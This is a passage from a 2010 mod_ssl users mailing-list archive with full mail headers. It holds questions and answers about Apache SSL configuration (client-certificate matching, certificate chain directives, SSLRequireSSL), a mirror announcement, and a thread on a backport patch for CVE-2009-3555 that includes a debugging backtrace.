X509_STORE_CTX_set_default(&ctx, "any");


Yaroslav
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb 15 09:17:05 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9F32214D876; Mon, 15 Feb 2010 09:17:05 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mx0.bln1.prohost.de (mxout0.bln1.prohost.de [213.160.84.46])
	by master.modssl.org (Postfix) with ESMTP id 2668814D84F
	for ; Mon, 15 Feb 2010 09:16:47 +0100 (CET)
Received: from remote.ubigrate.com (77-23-122-231-dynip.superkabel.de [77.23.122.231])
	(authenticated bits=0)
	by mx1.bln1.prohost.de (8.14.1/8.14.1) with ESMTP id o1F8EUaI026893
	(version=TLSv1/SSLv3 cipher=AES128-SHA bits=128 verify=FAIL)
	for ; Mon, 15 Feb 2010 09:14:31 +0100
Received: from AUCKLAND.ubigrate.corp ([::1]) by AUCKLAND.ubigrate.corp
 ([::1]) with mapi; Mon, 15 Feb 2010 09:09:26 +0100
From: Christoph Schmidt 
To: "modssl-users@modssl.org" 
Date: Mon, 15 Feb 2010 09:09:25 +0100
Subject: Trying to compare client-cert pem-file to %{SSL_CLIENT_CERT}
Thread-Topic: Trying to compare client-cert pem-file to %{SSL_CLIENT_CERT}
Thread-Index: AcquFjAkQLU0LgWKSHCXZv4plV6ymQ==
Message-ID: 
Accept-Language: en-US, de-DE
Content-Language: en-US
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
acceptlanguage: en-US, de-DE
Content-Type: multipart/alternative;
	boundary="_000_F03912326135044EBAEB11CC7E3F84D8A58DE9DF8FAUCKLANDubigr_"
MIME-Version: 1.0
X-Null-Tag: a3ec4efe73d2803c2d0952ebe896c558
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christoph Schmidt 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--_000_F03912326135044EBAEB11CC7E3F84D8A58DE9DF8FAUCKLANDubigr_
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Dear subscribers!

For a custom update site, we want to binary-check the (self-signed) certifi=
cates sent by our client applications against a physical copy of the certif=
icate residing on our server. (Standard matching rules are deployed and wor=
king, but considered "not enough".) The rules per application reside inside=
 an .htaccess file per directory associated with the solution.
The problem is that the comparison

SSLRequire ( %{SSL_CLIENT_CERT} =3D=3D file("/pathto/solutionIDxyzabc/CERT.=
pem") )

always fails ("[info] Failed expression:"). Loading the certificate into a =
fresh environment variable doesn't improve the situation, neither does hold=
ing the pem-encoded certificate data directly inside the rule. When I outpu=
t $_Server['SSL_CLIENT_CERT'] and the variable holding the reference certif=
icate via php, I get seemingly identical outputs. I think, tho, that the di=
fferences are in the realm of the non-printable characters of  the client c=
ertificate, like trailing spaces or line breaks, which can't be analyzed wi=
th php in the middle. Unfortunately, the rule can't be debugged so well in =
context, because of a lack of print statements in the configuration context=
. LogLevel debug states nothing more than that the rule given above failed =
to yield 'true'.

I checked the first couple dozen hits for "'SSL_CLIENT_CERT'" on Google, bu=
t all of them are either occurrences of the default configuration file (exp=
laining that ExportCertData generates the input for SSL_CLIENT_CERT and SSL=
_SERVER_CERT) or concerned with handing the certificate through a proxy to =
a backend server, which doesn't apply to my situation. The mailing list arc=
hive didn't seem to have a matching problem either (and encumbers the searc=
h by removing the _'s from SSL_CLIENT_CERT' :P).

I would be grateful for any pointers towards how to implement this rule or =
a specification as to how SSL_CLIENT_CERT is formatted (i.e. how the refere=
nce file/data should look).

The versions used:
# openssl version
OpenSSL 0.9.8g 19 Oct 2007
# apache2 -v
Server version: Apache/2.2.8 (Ubuntu)
Server built:   Jun 18 2009 08:45:39
Apache/2.2.8 (Ubuntu) DAV/2 SVN/1.4.6 mod_jk/1.2.25 mod_python/3.3.1 Python=
/2.5.2 PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g=
 mod_perl/2.0.3 Perl/v5.8.8 Server at * Port 443

Many thanks in advance!

Best regards,

--Christoph Schmidt

--_000_F03912326135044EBAEB11CC7E3F84D8A58DE9DF8FAUCKLANDubigr_
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
















Dear subscribers!=




 



For a custom update site, we want t=
o binary-check
the (self-signed) certificates sent by our client applications against a
physical copy of the certificate residing on our server. (Standard matching
rules are deployed and working, but considered “not enough”.) T=
he rules
per application reside inside an .htaccess file per directory associated wi=
th
the solution.



The problem is that the comparison =




 



SSLRequire ( %{SSL_CLIENT_CERT} =3D=
=3D
file("/pathto/solutionIDxyzabc/CERT.pem") )



 



always fails (“[info] Failed
expression:”). Loading the certificate into a fresh environment varia=
ble
doesn’t improve the situation, neither does holding the pem-encoded
certificate data directly inside the rule. When I output $_Server[‘SS=
L_CLIENT_CERT’]
and the variable holding the reference certificate via php, I get seemingly=
 identical
outputs. I think, tho, that the differences are in the realm of the
non-printable characters of  the client certificate, like trailing spa=
ces
or line breaks, which can’t be analyzed with php in the middle. Unfor=
tunately,
the rule can’t be debugged so well in context, because of a lack of p=
rint
statements in the configuration context. LogLevel debug states nothing more
than that the rule given above failed to yield ‘true’.



 



I checked the first couple dozen hi=
ts for “’SSL_CLIENT_CERT’”
on Google, but all of them are either occurrences of the default configurat=
ion
file (explaining that ExportCertData generates the input for SSL_CLIENT_CER=
T
and SSL_SERVER_CERT) or concerned with handing the certificate through a pr=
oxy
to a backend server, which doesn’t apply to my situation. The mailing
list archive didn’t seem to have a matching problem either (and encum=
bers
the search by removing the _’s from SSL_CLIENT_CERT’ :P).<=
/o:p>



 



I would be grateful for any pointer=
s
towards how to implement this rule or a specification as to how SSL_CLIENT_=
CERT
is formatted (i.e. how the reference file/data should look).



 



The versions used:



# openssl version=




OpenSSL 0.9.8g 19 Oct 2007



# apache2 -v



Server version: Apache/2.2.8 (Ubunt=
u)



Server built:   Jun 18 20=
09
08:45:39



Apache/2.2.8 (Ubuntu) DAV/2 SVN/1.4=
.6
mod_jk/1.2.25 mod_python/3.3.1 Python/2.5.2 PHP/5.2.4-2ubuntu5.6 with
Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 Serve=
r at
* Port 443



 



Many thanks in advance!<=
/span>



 



Best regards,



 



--Christoph Schmidt









--_000_F03912326135044EBAEB11CC7E3F84D8A58DE9DF8FAUCKLANDubigr_--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 17 08:10:30 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5BDA814D88A; Wed, 17 Feb 2010 08:10:30 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from kuber.nabble.com (kuber.nabble.com [216.139.236.158])
	by master.modssl.org (Postfix) with ESMTP id 8D0FD14D840
	for ; Wed, 17 Feb 2010 08:10:13 +0100 (CET)
Received: from isper.nabble.com ([192.168.236.156])
	by kuber.nabble.com with esmtp (Exim 4.63)
	(envelope-from )
	id 1Nhe0v-0006w0-U6
	for modssl-users@modssl.org; Tue, 16 Feb 2010 23:08:01 -0800
Message-ID: <27618358.post@talk.nabble.com>
Date: Tue, 16 Feb 2010 23:08:01 -0800 (PST)
From: NT984 
To: modssl-users@modssl.org
Subject: Which SSL Directives to use?
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Nabble-From: nicholas.a.thomas@gmail.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: NT984 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I am converting from a Verisign SSL Certificate to a Network Solutions EV SSL
Cert on my site. My existing configuration uses the following directives:

SSLEngine on
SSLCipherSuite ALL:!ADH:!EXP:RC4+RSA:+HIGH:+MEDIUM:!LOW:!SSLv2
SSLCertificateFile /etc/apache2/ssl.crt/my.blah.com.cert
SSLCertificateKeyFile /etc/apache2/ssl.key/my.blah.com.key
SSLCACertificateFile /etc/apache2/ssl.crt/my.blah.com.intermediate.crt

In the Network Solutions instructions, it recommends using the following:
SSLCertificateFile /etc/apache2/ssl.crt/my.blah.com.crt
SSLCertificateKeyFile /etc/apache2/ssl.key/my.blah.com.key
SSLCertificateChainFile /etc/apache2/ssl.crt/Apache_Plesk_Install.txt

In the  http://httpd.apache.org/docs/2.0/mod/mod_ssl.html apache mod_ssl
documentation , it states the following:

SSLCertificateChainFile
This should be used alternatively and/or additionally to
SSLCACertificatePath  for explicitly constructing the server certificate
chain which is sent to the browser in addition to the server certificate. It
is especially useful to avoid conflicts with CA certificates when using
client authentication. Because although placing a CA certificate of the
server certificate chain into SSLCACertificatePath  has the same effect for
the certificate chain construction, it has the side-effect that client
certificates issued by this same CA certificate are also accepted on client
authentication.

Example:
SSLCertificateChainFile /usr/local/apache2/conf/ssl.crt/ca.crt

SSLCACertificateFile
This directive sets the all-in-one file where you can assemble the
Certificates of Certification Authorities (CA) whose clients you deal with.
These are used for Client Authentication. Such a file is simply the
concatenation of the various PEM-encoded Certificate files, in order of
preference. This can be used alternatively and/or additionally to
SSLCACertificatePath.

Example
SSLCACertificateFile /usr/local/apache2/conf/ssl.crt/ca-bundle-client.crt


My question is... should I include both directives in my configuration? Is
there an advantage to doing so?  Now that I am upgrading, do I need to
consider modification of my SSLCipherSuite setting?

Any help would be appreciated.

Thx. nt
-- 
View this message in context: http://old.nabble.com/Which-SSL-Directives-to-use--tp27618358p27618358.html
Sent from the mod_ssl - Users mailing list archive at Nabble.com.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 17 10:00:59 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 22EDA14D88F; Wed, 17 Feb 2010 10:00:59 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from frfcqmg011ix3r8.montpellier.mebs.ihost.com (mail2.aspaway.fr [129.35.163.230])
	by master.modssl.org (Postfix) with ESMTP id 4FB9C14D840
	for ; Wed, 17 Feb 2010 10:00:40 +0100 (CET)
Received: from frfcqws071ix328.infra.montpellier.mebs.ihost.com (frfcqws071ix328 [10.0.77.8])
	by frfcqmg011ix3r8.montpellier.mebs.ihost.com (8.12.11.20060308/8.12.11) with ESMTP id o1H8wTN8024103
	for ; Wed, 17 Feb 2010 09:58:29 +0100
Subject: Jean-Pierre Guilloteau est absent.
From: jpguilloteau@aspaway.fr
To: modssl-users@modssl.org
Message-ID: 
Date: Wed, 17 Feb 2010 09:58:23 +0100
X-MIMETrack: Serialize by Router on MES01ASP/SRV/ASPAWAY(Release 7.0.2|September 26, 2006) at
 02/17/2010 09:58:29 AM
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jpguilloteau@aspaway.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I will be out of the office starting Wed 17/02/10 and will not return until
Thu 18/02/10.

I will respond to your message when I return.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 17 14:41:37 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 63FBE14D9EE; Wed, 17 Feb 2010 14:41:37 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail-vw0-f54.google.com (mail-vw0-f54.google.com [209.85.212.54])
	by master.modssl.org (Postfix) with ESMTP id 00B9814D840
	for ; Wed, 17 Feb 2010 14:41:20 +0100 (CET)
Received: by vws20 with SMTP id 20so786469vws.13
        for ; Wed, 17 Feb 2010 05:39:09 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from
         :user-agent:mime-version:to:subject:references:in-reply-to
         :content-type:content-transfer-encoding;
        bh=Z5dYaHKepEqg2arUprnEO+fRVlyNGHwicKaEh6ocDew=;
        b=OTmkIbNkDpLIdO9vVv+ygozayx2adUKY6IUhUcQ1zqT3PUamO5C0CuGX2bDod6Ye0q
         msy6CrjQ9pdCeGsorrcwRT+LnfLxrQyL4/ifEgeN5Mi2g5tQOZVBGktUm5+2ldh7BDQq
         NjILcn4Fii8JpDcvalXfzF5y73mw7o1zSTaQA=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:user-agent:mime-version:to:subject:references
         :in-reply-to:content-type:content-transfer-encoding;
        b=UuOBV0t1oH5TA50gCah8RvZACz/ZhpJBgoaMWVUL9m7hi2M+45K1n4Uh6fD6QUiIj3
         1KeeuAzhIpML3cg0X4KHzaXsZmFvRiGhOjUe++3JCc2HqQQ/ltQDlIwqc8b+DBndol8A
         sqqVfMQutKaci1HSxEg2r0Ts/hXCSUvwOWGus=
Received: by 10.220.107.17 with SMTP id z17mr4524225vco.191.1266413949356;
        Wed, 17 Feb 2010 05:39:09 -0800 (PST)
Received: from ?192.168.2.100? (c-98-221-197-193.hsd1.nj.comcast.net [98.221.197.193])
        by mx.google.com with ESMTPS id 30sm17475474vws.1.2010.02.17.05.39.08
        (version=TLSv1/SSLv3 cipher=RC4-MD5);
        Wed, 17 Feb 2010 05:39:08 -0800 (PST)
Message-ID: <4B7BF17B.3070300@gmail.com>
Date: Wed, 17 Feb 2010 08:39:07 -0500
From: Crypto Sal 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Gecko/20100212 Shredder/3.0.2pre
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Which SSL Directives to use?
References: <27618358.post@talk.nabble.com>
In-Reply-To: <27618358.post@talk.nabble.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Crypto Sal 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On 02/17/2010 02:08 AM, NT984 wrote:
> I am converting from a Verisign SSL Certificate to a Network Solutions EV SSL
> Cert on my site. My existing configuration uses the following directives:
>
> SSLEngine on
> SSLCipherSuite ALL:!ADH:!EXP:RC4+RSA:+HIGH:+MEDIUM:!LOW:!SSLv2
> SSLCertificateFile /etc/apache2/ssl.crt/my.blah.com.cert
> SSLCertificateKeyFile /etc/apache2/ssl.key/my.blah.com.key
> SSLCACertificateFile /etc/apache2/ssl.crt/my.blah.com.intermediate.crt
>
> In the Network Solutions instructions, it recommends using the following:
> SSLCertificateFile /etc/apache2/ssl.crt/my.blah.com.crt
> SSLCertificateKeyFile /etc/apache2/ssl.key/my.blah.com.key
> SSLCertificateChainFile /etc/apache2/ssl.crt/Apache_Plesk_Install.txt
>
> In the  http://httpd.apache.org/docs/2.0/mod/mod_ssl.html apache mod_ssl
> documentation , it states the following:
>
> SSLCertificateChainFile
> This should be used alternatively and/or additionally to
> SSLCACertificatePath  for explicitly constructing the server certificate
> chain which is sent to the browser in addition to the server certificate. It
> is especially useful to avoid conflicts with CA certificates when using
> client authentication. Because although placing a CA certificate of the
> server certificate chain into SSLCACertificatePath  has the same effect for
> the certificate chain construction, it has the side-effect that client
> certificates issued by this same CA certificate are also accepted on client
> authentication.
>
> Example:
> SSLCertificateChainFile /usr/local/apache2/conf/ssl.crt/ca.crt
>
> SSLCACertificateFile
> This directive sets the all-in-one file where you can assemble the
> Certificates of Certification Authorities (CA) whose clients you deal with.
> These are used for Client Authentication. Such a file is simply the
> concatenation of the various PEM-encoded Certificate files, in order of
> preference. This can be used alternatively and/or additionally to
> SSLCACertificatePath.
>
> Example
> SSLCACertificateFile /usr/local/apache2/conf/ssl.crt/ca-bundle-client.crt
>
>
> My question is... should I include both directives in my configuration? Is
> there an advantage to doing so?  Now that I am upgrading, do I need to
> consider modification of my SSLCipherSuite setting?
>
> Any help would be appreciated.
>
> Thx. nt
>    


NT,

You should use SSLCertificateChainFile if you're on Apache2.2. If you're 
on Apache 1.x, then typically you'll want to use SSLCACertificateFile. 
In Apache2, SSLCACertificate file is for Client Authentication, whereas 
in earlier versions it was for CertificateAuthority. Earlier versions of 
Apache 2.0 were able to use both interchangeably. Do not use both at the 
same time. Only if you're doing Client Authentication.

As far as your cipher suite goes... You'll also want to disable MD5 
based ciphers. (Opera 9.x will warn of weak ciphers in use as there are 
a few MD5 based in SSLv3/TLSv1.x)

Hope this helps,

--Sal



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 19 15:03:10 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2B1D114DA4A; Fri, 19 Feb 2010 15:03:10 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail-bw0-f209.google.com (mail-bw0-f209.google.com [209.85.218.209])
	by master.modssl.org (Postfix) with ESMTP id D9C7E14D840
	for ; Fri, 19 Feb 2010 15:02:53 +0100 (CET)
Received: by bwz1 with SMTP id 1so67725bwz.1
        for ; Fri, 19 Feb 2010 06:00:43 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=googlemail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from
         :user-agent:mime-version:to:subject:content-type
         :content-transfer-encoding;
        bh=/56ZlxIf1BMLhZ9WVxSXwrA0DHKQjWRAoeOHwq6LV88=;
        b=omamvxiFxXA3VjDlgwGeqeuLwUXtPRZgfNGA/wM+EJMyaEyTLEKSTu56o2+FczxS1S
         r7uLCBj62YjzGwBokl0/yVzBvLwXK3ty8Y1RRrY/q/zmSsLzNmT+ghBBzvAwFx6oFDmT
         FZW5qPzxUYQnFnzrN0qz1WnhNTuf86y/fehEA=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=googlemail.com; s=gamma;
        h=message-id:date:from:user-agent:mime-version:to:subject
         :content-type:content-transfer-encoding;
        b=mjH4fbDAHbPxPULk1tvV1HoQEaKkokxLEGrceGFMOWXhFyLmHVbGM3XAKlY8fJsROa
         +KjvHz/qWnxJHqOxsbRtuYNNa/lj00SKsfqJT7LMgO1N3w0+Fh8KI/tr4N0ThArWcSNo
         m42I7fkqtkxvkPkppu70j/8uRY2B9Kzj9Jg7c=
Received: by 10.204.138.205 with SMTP id b13mr2261325bku.73.1266588043018;
        Fri, 19 Feb 2010 06:00:43 -0800 (PST)
Received: from ?10.0.1.6? (pd95b0fdb.dip0.t-ipconnect.de [217.91.15.219])
        by mx.google.com with ESMTPS id 15sm66533bwz.4.2010.02.19.06.00.42
        (version=TLSv1/SSLv3 cipher=RC4-MD5);
        Fri, 19 Feb 2010 06:00:42 -0800 (PST)
Message-ID: <4B7E9988.3090001@googlemail.com>
Date: Fri, 19 Feb 2010 15:00:40 +0100
From: Tobias Hensel 
User-Agent: Thunderbird 2.0.0.23 (Windows/20090812)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: SSLRequireSSL within LimitExcept
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Tobias Hensel 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I've set up a SVN with access via apache with and without SSL. I like to 
confire that anoymous users have ro-access to the svn via http and https 
and authenticated users have rw-access only via https.
I've seen a few examples on the internet where this has been made by 
adding SSLRequireSSL within LimitExcept.
I added the following to my svn-config


   DAV svn
   SVNPath /svn/svnpath
   AuthType Basic
   AuthName "Subversion Repository"
   AuthUserFile authfile
   
     Require valid-user
     SSLRequireSSL
   


When I access the svn via https it works, but when I access it via http 
it does not work an I get the following error in my log:

/var/log/apache2/error.log:
[Fri Feb 19 13:53:09 2010] [error] [client 127.0.0.1] access to 
/var/www/svn failed, reason: SSL connection required

/var/log/apache2/access.log:
127.0.0.1 - - [19/Feb/2010:13:53:09 +0100] "GET /svn/ HTTP/1.0" 403 183 
"-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.8) 
Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)"

Should this work or is it just not possible to use SSLRequireSSL within 
LimitExcept?

Greetings

Tobias
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar  1 16:07:13 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4956B14D889; Mon,  1 Mar 2010 16:07:13 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mailout.artfiles.de (mailout.artfiles.de [80.252.97.80])
	by master.modssl.org (Postfix) with ESMTP id 06C4114D836
	for ; Mon,  1 Mar 2010 16:06:56 +0100 (CET)
Received: from [80.252.98.63]
	auth=anw@artfiles.de
	by mailout.artfiles.de with esmtpa (Exim 4.69)
	id 1Nm7Ar-0006UD-7a
	for modssl-users@modssl.org; Mon, 01 Mar 2010 16:04:45 +0100
Message-ID: <4B8BD78B.9090505@artfiles.org>
Date: Mon, 01 Mar 2010 16:04:43 +0100
From: Andreas Worbs 
User-Agent: Thunderbird 2.0.0.23 (X11/20090817)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: modssl mirror
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andreas Worbs 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,
here are the facts about our mirror:

* URL of mirror: http://artfiles.org/modssl.org
* URL of mirror: ftp://artfiles.org/modssl.org
* Hosting institution, country and city where the mirror is located:
Artfiles New Media GmbH, Hamburg, Germany
* Contact email address: mirror@artfiles.org
* Update frequency:  daily
* IP: 80.252.110.38
* Speed: 1000MBit/s
Please add us to your list.

With best regards

Artfiles New Media GmbH

Andreas Worbs

-- 
Artfiles New Media GmbH | Heidenkampsweg 100 | 20097 Hamburg
Tel: 040 - 32 02 72 90 | Fax: 040 - 32 02 72 95
E-Mail: support@artfiles.de | Web: http://www.artfiles.de
Geschäftsführer: Carsten Bals | Harald Oltmanns | Tim Evers
Eingetragen im Handelsregister Hamburg - HRB 81478

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar 17 07:35:55 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id BD98A14D9EB; Wed, 17 Mar 2010 07:35:55 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mailserver.kippdata.de (capsella.kippdata.de [195.227.30.149])
	by master.modssl.org (Postfix) with ESMTP id 3AB2A14D836
	for ; Wed, 17 Mar 2010 07:35:39 +0100 (CET)
Received: from [192.168.2.106] ([192.168.2.106])
	by mailserver.kippdata.de (8.13.5/8.13.5) with ESMTP id o2H6XPAT026709
	for ; Wed, 17 Mar 2010 07:33:26 +0100 (CET)
Message-ID: <4BA077B5.3030103@kippdata.de>
Date: Wed, 17 Mar 2010 07:33:25 +0100
From: Rainer Jung 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.8) Gecko/20100227 Thunderbird/3.0.3
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: [PATCH] Backport patch for CVE-2009-3555 from Apache 2.x
References: <4B08840C.4000203@kippdata.de> <1258999075.4992.15.camel@work.cptxoffice.net> <4B0AFAAD.2000504@kippdata.de>	 <1262123831.23152.61.camel@work.cptxoffice.net> <4B3E5E90.8030606@kippdata.de>
In-Reply-To: <4B3E5E90.8030606@kippdata.de>
Content-Type: text/plain; charset=ISO-8859-15; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Rainer Jung 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I updated the patch. The most recent version is now available at

http://people.apache.org/~rjung/patches/cve-2009-3555_mod_ssl_2_8_31-1_3_41-v4.patch

In addition to the v3 version of the patch, it now also contains a 
backport of the SSLInsecureRenegotiation directive introduced in Apache 
httpd 2.2.15 in combination with OpenSSL 0.9.8m and beyond.

The patch needs some more testing, but backport was straightforward.

Regards,

Rainer

On 01.01.2010 21:44, Rainer Jung wrote:
> On 29.12.2009 22:57, John Lightsey wrote:
>> On Mon, 2009-11-23 at 22:12 +0100, Rainer Jung wrote:
>>> On 23.11.2009 18:57, John Lightsey wrote:
>>>> On Sun, 2009-11-22 at 01:21 +0100, Rainer Jung wrote:
>>
>>> Thanks again. I updated the patch:
>>>
>>> http://people.apache.org/~rjung/patches/cve-2009-3555_mod_ssl_2_8_21-1_3_41-v2.patch
>>>
>>>
>>> The only changes are in ssl_engine_io.c, where the declaration of "char
>>> *reneg" is moved 4 times to the beginning of the function. Anything else
>>> you observed?
>>
>> I received a report of segfaults caused by this patch. They happen when
>> you have Apache proxy connections to a SSL destination. IE:
>>
>> RewriteRule ^/(.*) https://other_site.com/$1 [P]
>>
>> The segfault happens at:
>>
>> reneg = ap_ctx_get(c->client->ctx, "ssl::reneg");
>>
>> in ssl_io_suck_read() because SSL_get_app_data(ssl) returns NULL.
>>
>>
>> #0 0x0000000000454bb5 in ssl_io_suck_read (ssl=0x10a26070,
>> buf=0x107ccd88 "UserDir", len=4096) at ssl_engine_io.c:275
>> actx = (ap_ctx *) 0x10a26070
>> ss = (struct ssl_io_suck_st *) 0x0
>> r = (request_rec *) 0x0
>> rv = 0
>> reneg = 0x0
>> c = (conn_rec *) 0x0
>> #1 0x0000000000454f31 in ssl_io_hook_read (fb=0x10a25c28,
>> buf=0x107ccd88 "UserDir", len=4096) at ssl_engine_io.c:394
>> ssl = (SSL *) 0x10a26070
>> c = (conn_rec *) 0x0
>> s = (server_rec *) 0x0
>> rc = 0
>> reneg = 0x0
>> #2 0x000000000049a00f in ap_hook_call_func (ap=0x7fff98699110,
>> he=0x104f33b0, hf=0x105059c0) at ap_hook.c:649
>> v1 = (void *) 0x10a25c28
>> v2 = (void *) 0x107ccd88
>> v3 = 4096
>> v_rc = (void *) 0x7fff9869922c
>> v_tmp = {v_char = 0 '\0', v_int = 0, v_long = 0, v_float = 0,
>> v_double = 0, v_ptr = 0x0}
>> rc = 1
>> #3 0x00000000004982db in ap_hook_call (hook=0x4bbb5a "ap::buff::read")
>> at ap_hook.c:382
>> i = 0
>> he = (ap_hook_entry *) 0x104f33b0
>> ap = {{gp_offset = 40, fp_offset = 48, overflow_arg_area =
>> 0x7fff98699200, reg_save_area = 0x7fff98699140}}
>> rc = 0
>> #4 0x000000000046af22 in ap_read (fb=0x10a25c28, buf=0x107ccd88,
>> nbyte=4096) at buff.c:255
>> rv = 0
>
> Thank you for your feedback and the analysis. I could reproduce this and
> have updated the patch:
>
> http://people.apache.org/~rjung/patches/cve-2009-3555_mod_ssl_2_8_21-1_3_41-v3.patch
>
>
> I tested with and without SSL_EXPERIMENTAL_PROXY and it worked for my
> tests. The code doesn't try to change/fix renegotiation behaviour for
> ssl on the client side when used as a proxy.
>
> As always: feedback welcome!
>
> Regards,
>
> Rainer
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl) www.modssl.org
> User Support Mailing List modssl-users@modssl.org
> Automated List Manager majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar 17 10:04:33 2010
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 90EA014D880; Wed, 17 Mar 2010 10:04:33 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from frfcqmg011ix3r8.montpellier.mebs.ihost.com (mail2.aspaway.fr [129.35.163.230])
	by master.modssl.org (Postfix) with ESMTP id 04CEC14D836
	for ; Wed, 17 Mar 2010 10:04:16 +0100 (CET)
Received: from frfcqws071ix328.infra.montpellier.mebs.ihost.com (frfcqws071ix328 [10.0.77.8])
	by frfcqmg011ix3r8.montpellier.mebs.ihost.com (8.12.11.20060308/8.12.11) with ESMTP id o2H924Ut019108
